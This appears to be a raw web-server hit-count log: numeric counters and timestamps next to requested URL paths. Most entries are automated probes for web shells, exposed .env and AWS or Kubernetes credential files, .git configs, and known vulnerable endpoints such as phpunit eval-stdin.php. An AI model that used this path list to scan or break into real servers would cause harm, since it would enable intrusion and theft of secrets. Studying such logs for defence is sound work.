0 0 29080865 0 0 29080865 0 0 435 /.well-known/acme-challenge/isaY_nKJkJCmKmt-isOZPbIk7PoT5yrGnuQnOVe7M5A 1 0 0 0 4 0 0 29190016 0 0 28770893 0 /db.sql 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /assets/themes/metronic/global/jquery-file-upload/server/php/ 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-includes/js/codemirror/index.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-content/masshp.php 1 0 0 0 11 0 0 29415979 0 0 29340771 0 /file9.php 1 0 0 0 1 0 0 29100021 0 0 29100021 0 /index.php?params=1 1 0 0 0 2 0 0 29389715 0 0 29335553 0 /st.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /cba.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /kubernetes/kubeconfig.json 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/wp-login.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /react-app/.env 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws/credentials/backup.ini 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /config/storage.yml 1 0 0 0 8 0 0 29389715 0 0 29335672 0 /3.php 1 0 0 0 2 0 0 29344750 0 0 29340771 0 /en0.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /vendor/.env.save 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /config/parameters.yml 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /vansec.php 1 0 0 0 5 0 0 29220646 0 0 28770893 0 /backup/ 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /xmlrpc.php 1 0 0 0 10 0 0 29387345 0 0 29311382 0 /makeasmtp.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /zxin.php 1 0 0 0 7 0 0 29364332 0 0 29175678 0 /i.php 1 0 0 0 3 0 0 29400763 0 0 29395728 0 /.well-known/acme-challenge/install.php 1 1 0 0 0 29080864 0 0 29080864 0 0 64 /.well-known/acme-challenge/RF0DLHYUUV7E3NVG7V_3DZX1XE8ZDNM6 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /go.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /api/.env.bak 1 0 0 0 1 0 0 29126039 0 0 29126039 0 /package.json 1 0 0 0 4 0 0 29387345 0 0 29311382 0 /aa17.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /var/.git/config 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /public/info.php.save 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /fix.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /api/admin/keys 1 0 0 0 1 0 0 29370559 0 0 29370559 0 /jatuh.php 1 0 0 0 6 0 0 29404800 0 0 29344750 0 /lx.php 1 0 0 0 3 0 0 29387345 0 0 29311382 0 /mo.php 1 0 0 0 1 0 0 29400764 0 0 29400764 0 /03.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /old/ 1 0 0 0 4 0 0 28770897 0 0 28770893 0 /images/ 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /lhh2.php 1 0 0 0 3 0 0 29358846 0 0 29347757 0 /tinyfilemanager/tinyfilemanager.php 1 0 0 0 2 0 0 29352213 0 0 29346262 0 /a4.php 1 0 0 0 4 0 0 29356483 0 0 29175678 0 /.env.prod 1 0 0 0 12 0 0 29385019 0 0 29335672 0 /file4.php 1 0 0 0 2 0 0 29346261 0 0 29343317 0 /rx.php 1 0 0 0 1 0 0 29372534 0 0 29372534 0 /admin-header.php?3.17.57.190 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /scripts/aws_secrets_loader.py 1 0 0 0 16 0 0 29389715 0 0 29335553 0 /filesss.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /bin.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /v1/.env 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /icomsium.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-admin/maint/admin.php 1 0 0 0 25 0 0 29415979 0 0 29285439 0 /gmo.php 1 0 0 0 3 0 0 29389715 0 0 29383909 0 /aj.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /lock1.php 1 0 0 0 2 0 0 29364908 0 0 29346543 0 /swagger-ui.html 1 0 0 0 7 0 0 29415979 0 0 29335672 0 /xx.php 1 0 0 0 2 0 0 29385019 0 0 29383909 0 /file52.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /layout.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /system.php 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /_all_dbs 1 0 0 0 1 0 0 29379198 0 0 29379198 0 /fs.php 1 0 0 0 1 0 0 29344750 0 0 29344750 0 /hlex.php 1 0 0 0 3 0 0 29415979 0 0 29400764 0 /ha.php 1 0 0 0 1 0 0 29263273 0 0 29263273 0 /wp-json/wp/v2/users?3.17.57.190 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /server/.env 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /backend/config/settings.yml 1 0 0 0 2 0 0 29389715 0 0 29379197 0 /777.php 1 0 0 0 7 0 0 29415978 0 0 29376908 0 /wp-admin/maint/maint.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.kube/config 1 0 0 0 11 0 0 29381149 0 0 29335672 0 /031.php 1 0 0 0 1 0 0 29220647 0 0 29220647 0 /import.php 1 0 0 0 4 0 0 29404800 0 0 29395728 0 /ww3.php 1 0 0 0 412 0 0 29411307 0 0 28641363 0 /favicon.ico 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /user/controllers/index.js 1 0 0 0 2 0 0 29397689 0 0 29395728 0 /jagoan.php 1 0 0 0 1 0 0 29208069 0 0 29208069 0 /info 1 0 0 0 31 0 0 29402830 0 0 28905524 0 /xmlrpc.php?rsd 1 0 0 0 1 0 0 29268042 0 0 29268042 0 /phpinfo1.php 1 0 0 0 15 0 0 29387345 0 0 29354786 0 /goods.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /deployment.yaml 1 0 0 0 11 0 0 29388817 0 0 29175678 0 /api/.env 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /config/phpinfo.php 1 0 0 0 10 0 0 29381255 0 0 29346261 0 /chosen.php 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /Wop.php 1 0 0 0 18 0 0 28802840 0 0 28802835 0 /tailwind.css 1 0 0 0 3 0 0 29397689 0 0 29376909 0 /wp-includes/css/dist/preferences/wp-login.php 1 0 0 0 4 0 0 29389715 0 0 29340771 0 /eauu.php 1 0 0 0 2 0 0 29389715 0 0 29379197 0 /ae.php 1 1 0 0 0 28641361 0 0 28641361 0 0 64 /.well-known/acme-challenge/IZ7I3DXQUBM70WBOALA5_R-6ABK-AYSE 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /xs.php 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /kao.php 1 0 0 0 2 0 0 29364908 0 0 29346543 0 /graphql/api 1 5 0 0 0 28641362 0 0 28641362 0 0 435 /.well-known/acme-challenge/4anHKe7J2VNfB-Pn6WlnvtCTh4X2jgfk1VZWd3Gqcl4 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /config/kubernetes.yaml 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /er8.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /abruzi.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /assets/plugins/filemanager/dialog.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /includes/.env.old 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /helper/EmailHelper.js 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /42u.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /backups/db/backup.sql 1 0 0 0 2 0 0 29220648 0 0 29190016 0 /secrets.json 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /api/.git/config 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/v2/admin/secret 1 1 0 0 0 28905003 0 0 28905003 0 0 87 /.well-known/acme-challenge/flWkdRPi7T5m5EAyLqt7vLuoCE2p6Q3OfuK3NEwwNBo?164.92.77.30 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /my_env/palash.py 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/admin.html 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /api137.php 1 0 0 0 5 0 0 29381149 0 0 29365203 0 /errorfile.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /info.php.bak 1 0 0 0 12 0 0 29415979 0 0 29340771 0 /gifclass4.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-includes/style-engine/about.php 1 0 0 0 3 0 0 29415978 0 0 29376909 0 /file.php? 1 0 0 0 4 0 0 29356483 0 0 29190016 0 /.env.dev 1 0 0 0 3 0 0 29397689 0 0 29376908 0 /wp-content/themes/astra/inc/ki1k.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /enkkk.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-content/mode.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /config/settings.prod 1 0 0 0 4 0 0 29356484 0 0 29287581 0 /assets/.env 1 0 0 0 2 0 0 29190016 0 0 29175678 0 /config/aws.yml 1 0 0 0 18 0 0 29091876 0 0 28814238 0 /favicon.ico?164.92.77.30 1 0 0 0 20 0 0 29400763 0 0 29285439 0 /wp-content/plugins/hellopress/wp_filemanager.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /assets/color_admin/plugins/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /Hd.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /includes/info.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /graphiql 1 0 0 0 2 0 0 29352213 0 0 29346262 0 /f3.php 1 0 0 0 3 0 0 29389715 0 0 29346261 0 /ww.php 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /2eaa2.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /Z.php 1 0 0 0 4 0 0 29159382 0 0 28974063 0 /assets/admin/bower_components/jquery.filer/php/readme.txt 1 0 0 0 5 0 0 29385019 0 0 29340771 0 /wp-aaa.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /w3llstore.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wsanon.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /bb2.php 1 0 0 0 4 0 0 29381150 0 0 29370559 0 /class-.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /bi1f.php 1 0 0 0 2 0 0 29379197 0 0 29335553 0 /ropyx.php 1 0 0 0 1 0 0 29346262 0 0 29346262 0 /ncx.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-includes/lx.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /shelp.php 1 0 0 0 3 0 0 29356484 0 0 29175678 0 /application/.env 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-db.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws-keys.bak 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /t3x.php 1 0 0 0 1 0 0 29344750 0 0 29344750 0 /ger.php 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /wtz.php 1 0 0 0 12 0 0 29403111 0 0 28770893 0 /wp-login.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /themes/.env.save 1 0 0 0 2 0 0 29220648 0 0 29190016 0 /secrets.yml 1 0 0 0 2 0 0 29159383 0 0 29126039 0 /ALFA_DATA/alfacgiapi/perl.alfa 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /backups/ 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /php_info.php~ 1 0 0 0 1 0 0 29268042 0 0 29268042 0 /config/env.json 1 0 0 0 1 0 0 29268042 0 0 29268042 0 /.env.docker 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phpversion.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /private/config.tar.gz 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /nox.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /?phpinfo=1 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /scripts/setup-mail.sh 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /pvt.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /assets/admin/js/tinymce/plugins/filemanager/dialog.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /U.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /test/info.php.save 1 0 0 0 4 0 0 29388817 0 0 29190016 0 /.env.test 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /new/.env.production 1 0 0 0 3 0 0 29415978 0 0 29400763 0 /tx1.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /wiki/.git/config 1 0 0 0 3 0 0 29345798 0 0 29335672 0 /wpc.php 1 1 0 0 0 28729323 0 0 28729323 0 0 87 /.well-known/acme-challenge/N0Ohz7mR0gw9bdUvah0lfJkwZq6SFitJl44DrKvT6go?104.166.80.49 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /xl6.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /api/admin/config 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /output.php 1 0 0 0 4 0 0 29389715 0 0 29379198 0 /yasnu.php 1 0 0 0 8 0 0 29381149 0 0 29335553 0 /555.php 1 0 0 0 12 0 0 29389715 0 0 29311382 0 /gfile.php 1 0 0 0 4 0 0 29387345 0 0 29311382 0 /akc.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /check.php 1 0 0 0 3 0 0 29387345 0 0 29311382 0 /public/wsr2.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /admin/.git/config 1 0 0 0 21 0 0 29415978 0 0 28770894 0 /admin.php 1 0 0 0 6 0 0 29397689 0 0 29343317 0 /moon.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /admin-post.php 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /config/config.env 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /144.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /Alex-Cross.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /assets/tinymce/plugins/filemanager/dialog.php 1 0 0 0 4 0 0 29415978 0 0 29397689 0 /x50.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /vv.php 1 0 0 0 4 0 0 29381150 0 0 29370559 0 /file30.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/test 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /server/phpinfo.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /api/debug 1 0 0 0 2 0 0 29220648 0 0 29175678 0 /main.js 1 1 0 0 0 28905002 0 0 28905002 0 0 64 /.well-known/acme-challenge/2V-ZJQG5LCL0B67S0MFCJW4JYWQSSTFV 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /past1.php 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /.idea/workspace.xml 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /P.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-includes/customize/about.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /hello.php 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /zeu.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /acp.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /rules.php 1 0 0 0 3 0 0 29388817 0 0 29190016 0 /docker-compose.override.yml 1 0 0 0 4 0 0 28770897 0 0 28770893 0 /admin/ 1 0 0 0 1 0 0 29400764 0 0 29400764 0 /show.php 1 0 0 0 6 0 0 29381149 0 0 29365203 0 /gool.php 1 0 0 0 2 0 0 29388817 0 0 29175678 0 /application.properties 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /psnlink/.env 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /jq.php 1 0 0 0 11 0 0 29368116 0 0 29117738 0 /favicon.ico?3.17.57.190 1 0 0 0 1 0 0 28770897 0 0 28770897 0 /Admin.php 1 1 0 0 0 28641367 0 0 28641367 0 0 328 /_autoindex/assets/icons/corner-left-up.svg 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /about 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /anskrit.php 1 0 0 0 1 0 0 29268042 0 0 29268042 0 /settings 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /resp.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /35.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /modules/.env.save 1 0 0 0 1 0 0 28846999 0 0 28846999 0 /wp-login.php?164.92.77.30 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /drop.php 1 0 0 0 13 0 0 29400764 0 0 29285439 0 /error.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /wh.php 1 0 0 0 3 0 0 29397689 0 0 29376908 0 /bs1.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /.well-known/fm.php 1 0 0 0 4 0 0 29356483 0 0 29208140 0 /.env.staging 1 0 0 0 2 0 0 29381255 0 0 29346261 0 /size.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /K.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /storage/.env.old 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /server-info 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /nxac.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /packages/api/.env 1 0 0 0 3 0 0 29300484 0 0 29249482 0 /_ignition/execute-solution?3.17.57.190 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /htdocs/.git/config 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws_secrets.json 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /pinfo.php 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /wp-admin/css/colors/midnight/about.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /lib/.env.bak 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /tox.php 1 0 0 0 1 0 0 29268042 0 0 29268042 0 /credentials 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /assets/jquery-file-upload/server/php/ 1 0 0 0 2 0 0 29361167 0 0 29357594 0 /rest 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /fs6.php 1 0 0 0 4 0 0 29159382 0 0 28974063 0 /assets/plugins/jquery.filer/php/readme.txt 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /test.php~ 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /k8s/deployment/backup.yaml 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /k8s/cluster-config.yaml 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /o2ll13.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /v6.php 1 0 0 0 5 0 0 29381255 0 0 29340771 0 /goat.php 1 0 0 0 7 0 0 29387345 0 0 29365203 0 /ant.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /gelay.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /bypass403.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /asasx.php 1 0 0 0 5 0 0 29381149 0 0 29365203 0 /0xx.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /awh77.php 1 0 0 0 11 0 0 29415978 0 0 29365203 0 /htaccess.php 1 0 0 0 1 0 0 29346262 0 0 29346262 0 /d1.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /node-api/.env 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /wc.php 1 0 0 0 2 0 0 29385019 0 0 29383909 0 /cabs.php 1 0 0 0 14 0 0 29385019 0 0 29335672 0 /file18.php 1 0 0 0 2 0 0 29379197 0 0 29346261 0 /past.php 1 0 0 0 4 0 0 29387345 0 0 29381255 0 /wp-mn.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /F.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/v1/private/sendgrid-config 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /whf.php 1 0 0 0 2 0 0 29159383 0 0 29126039 0 /demo 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /cdn-cgi/trace 1 0 0 0 1 0 0 28770897 0 0 28770897 0 /styles.css 1 0 0 0 4 0 0 29379198 0 0 29340771 0 /bolt.php 1 0 0 0 27 0 0 28718158 0 0 28655943 0 /?195.211.77.140 1 0 0 0 6 0 0 29415978 0 0 29376908 0 /install.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /flower.php 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /dump.sql 1 0 0 0 1 0 0 29220651 0 0 29220651 0 /upload_handler.php 1 0 0 0 6 0 0 29389715 0 0 29358297 0 /wso.php 1 0 0 0 13 0 0 29415979 0 0 29340771 0 /333.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /config/settings.json 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /v1.php 1 1 0 0 0 29346542 0 0 29346542 0 0 64 /.well-known/acme-challenge/TR324P09PPBD8DNVOG02YWYTIE9J64MX 1 0 0 0 2 0 0 29344750 0 0 29340771 0 /ggfi.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /2020.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /wp-admin/images/singlep.php 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /0xs.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /po8sa.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-class.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /lufix.php 1 0 0 0 21 0 0 29415979 0 0 29335553 0 /403.php 1 0 0 0 2 0 0 29381255 0 0 29346262 0 /lite.php 1 0 0 0 7 0 0 29387345 0 0 29370559 0 /up.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /ty.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /file13.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /admin/settings 1 0 0 0 2 0 0 29343317 0 0 29311382 0 /xhouf.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /config/settings.local 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /A.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phpinfo.php.bak 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/readme.md 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /ioxi-o2.php 1 0 0 4 2 0 28802838 29379197 0 28802836 28802835 0 /db.php 1 0 0 0 5 0 0 29356483 0 0 29175678 0 /.env.bak 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-admin/maint/index.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /yzkvrell.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /new/.env 1 0 0 0 4 0 0 29415979 0 0 29335672 0 /ton.php 1 0 0 0 32 0 0 29382042 0 0 28697867 0 /robots.txt 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /mjq.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /minik.php 1 0 0 0 4 0 0 29385019 0 0 29335672 0 /aves.php 1 0 0 0 11 0 0 29415978 0 0 29335672 0 /w.php 1 0 0 0 2 0 0 29159383 0 0 29126039 0 /alfacgiapi/perl.alfa 1 0 0 0 2 0 0 29379197 0 0 29361975 0 /user.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /post-data.php 1 0 0 0 11 0 0 29385019 0 0 29335672 0 /fileas.php 1 0 0 0 3 0 0 29344750 0 0 29335553 0 /ht.php 1 0 0 0 2 0 0 29397689 0 0 29395728 0 /wikindex.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /jlex.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /xpas22.php 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /aa33.php 1 0 0 0 5 0 0 29356484 0 0 29175678 0 /public/.env 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /web/phpinfo.php.save 1 0 0 0 19 0 0 29415978 0 0 29346262 0 /ioxi-o.php 1 0 0 0 5 0 0 29289461 0 0 29126039 0 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /%E5%B9%B3%E4%BB%AE%E5%90%8Ds.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws-credentials.bak 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /ok.php 1 0 0 0 1 0 0 29093420 0 0 29093420 0 /.git/config?164.92.77.30 1 0 0 0 4 0 0 29400764 0 0 29376909 0 /wp-admin/setup-config.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /sitemaps/.env 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /app/.env.save 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /info2.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /btufulhs.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /use.php 1 0 0 0 2 0 0 29388817 0 0 29190016 0 /logs/debug.log 1 0 0 0 7 0 0 29381149 0 0 29335672 0 /ssss.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /public/phpinfo.php 1 0 0 0 3 0 0 29387345 0 0 29340771 0 /aa8.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /vb.php 1 0 0 0 3 0 0 29389715 0 0 29383262 0 /aua.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /ccx/index.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /www/phpinfo.php.save 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /cache.php 1 0 0 0 1 0 0 29381255 0 0 29381255 0 /k90.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /about.php7 1 0 0 0 19 0 0 29389628 0 0 28994986 0 /sito/wp-includes/wlwmanifest.xml 1 5 0 0 0 29346542 0 0 29346542 0 0 435 /.well-known/acme-challenge/IaBvzXTzE-W9speRL1blLqD19DdOSXR6tzzQ_9HBP_g 1 0 0 0 4 0 0 28653726 0 0 28644142 0 /?104.166.80.183 1 0 0 0 5 0 0 29387345 0 0 29346262 0 /cf.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.output/aws_keys_backup.tar.gz 1 0 0 0 4 0 0 29387345 0 0 29372583 0 /thai.php 1 1 0 0 0 28729322 0 0 28729322 0 0 64 /.well-known/acme-challenge/YQX222Q5H5BXBNJUUN2VIVV15EPVVFX3 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /blog.env 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wp-x7.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.git/objects/pack/pack-*.idx 1 0 0 0 4 0 0 29289461 0 0 29151609 0 /.env?3.17.57.190 1 0 0 0 2 0 0 29397689 0 0 29395728 0 /wp-includes/0.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /old-site/ 1 0 0 0 4 0 0 29378467 0 0 29335672 0 /r.php 1 0 0 0 3 0 0 29370559 0 0 29340771 0 /class-wp.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /marijuana.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/config.php 1 0 0 0 2 0 0 29379197 0 0 29335553 0 /uploxe.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /store.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/sitemap.xml 1 0 0 0 5 0 0 29381150 0 0 29370559 0 /bless10.php 1 0 0 0 2 0 0 28901598 0 0 28890983 0 /robots.txt?164.92.77.30 1 0 0 0 4 0 0 29387345 0 0 29311382 0 /wander.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /php_info.php.save 1 0 0 0 4 0 0 29387344 0 0 29344750 0 /blue.php 1 0 0 0 2 0 0 29190016 0 0 29175678 0 /config/config.json 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /autoload_classmap.php 1 0 0 0 6 0 0 29389715 0 0 29346262 0 /13.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /css/.git/config 1 0 0 0 22 0 0 29415978 0 0 29346262 0 /css.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/stripe/keys 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /deployment/aws-ses.yml 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /sk25_1.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /public/.env.old 1 0 0 0 11 0 0 28770897 0 0 28739840 0 /sitemap.xml 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /exports/aws-config.json 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /to.php 1 0 0 0 12 0 0 29415979 0 0 29365203 0 /sx.php 1 0 0 0 102 0 0 29103518 0 0 28808576 0 /?164.92.77.30 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /unity.php 1 0 0 0 5 0 0 29171690 